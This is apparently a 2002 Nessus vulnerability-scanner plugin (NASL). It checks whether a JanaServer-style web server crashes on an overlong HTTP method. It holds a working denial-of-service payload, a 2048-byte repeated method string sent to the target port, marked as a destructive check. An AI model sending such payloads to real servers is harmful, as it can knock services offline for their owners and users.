#
# This script was written by Michel Arboi <arboi@bigfoot.com>
# GPL
# *untested*
#
# References:
# From:"Matthew Murphy" <mattmurphy@kc.rr.com>
# To:"BugTraq" <bugtraq@securityfocus.com>, 
#  "Vuln-Dev" <vuln-dev@securityfocus.com>, 
#  "SecurITeam News" <news@securiteam.com>,
#  "Full Disclosure" <full-disclosure@lists.netsys.com>
# Subject: Unchecked Buffer in Jana Web Server
# Date: Mon, 5 Aug 2002 17:38:45 -0500
#
# Date:  Fri, 26 Jul 2002 12:12:45 +0400
# From: "3APA3A" <3APA3A@SECURITY.NNOV.RU>
# To: bugtraq@securityfocus.com
# Subject: SECURITY.NNOV: multiple vulnerabilities in JanaServer
#
# Affected:
# JanaServer?
# 


if(description)
{
 script_id(11065);
 script_version ("$Revision: 1.2 $");
 name["english"] = "HTTP method overflow";
 script_name(english:name["english"]);
 
 desc["english"] = "It was possible to kill the web server by
sending an invalid request with a too long HTTP method field

A cracker may exploit this vulnerability to make your web server
crash continually or even execute arbirtray code on your system.

Solution : upgrade your software or protect it with a filtering reverse proxy
Risk factor : High";

 script_description(english:desc["english"]);
 
 summary["english"] = "too long HTTP method kills the web server";
 script_summary(english:summary["english"]);
 
 script_category(ACT_DESTRUCTIVE_ATTACK);
 
 script_copyright(english:"This script is Copyright (C) 2002 Michel Arboi");
 family["english"] = "Denial of Service";
 script_family(english:family["english"]);
 script_require_ports("Services/www", 80);
 exit(0);
}

########

if (safe_checks()) exit(0);

r = string(crap(data:"HEADNESSUSNESSUS", length: 2048), " / HTTP/1.0\r\n\r\n");

port = get_kb_item("Services/www");
if(!port) port = 80;
if(! get_port_state(port)) exit(0);

soc = http_open_socket(port);
if(! soc) exit(0);

send(socket:soc, data: r);
r = recv(socket:soc, length:4096);
close(soc);

sleep(1);

soc = open_sock_tcp(port);
if(!soc) { security_hole(port); exit(0); }
close(soc);

